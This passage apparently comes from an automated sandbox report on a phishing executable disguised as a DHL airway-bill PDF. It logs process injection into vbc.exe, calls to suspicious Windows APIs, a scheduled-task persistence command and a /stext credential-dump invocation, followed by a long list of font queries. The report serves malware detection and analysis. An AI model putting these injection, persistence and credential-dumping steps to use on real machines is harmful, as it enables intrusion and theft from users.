            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 365008Jump to behavior
            .NET source code references suspicious native API functionsShow sources
            Source: 7.2.DHL_AWB 518877882999_887755468_pdf.exe.400000.0.unpack, u200d????????????????????????????????????????.csReference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\cmsyNzu' /XML 'C:\Users\user\AppData\Local\Temp\tmp70BF.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp1B0D.tmp'Jump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp11A3.tmp'Jump to behavior
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000000.00000002.285852957.0000000003419000.00000004.00000001.sdmpBinary or memory string: ProgMan
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: DHL_AWB 518877882999_887755468_pdf.exe, 00000007.00000002.523232752.0000000001C40000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\DHL_AWB 518877882999_887755468_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
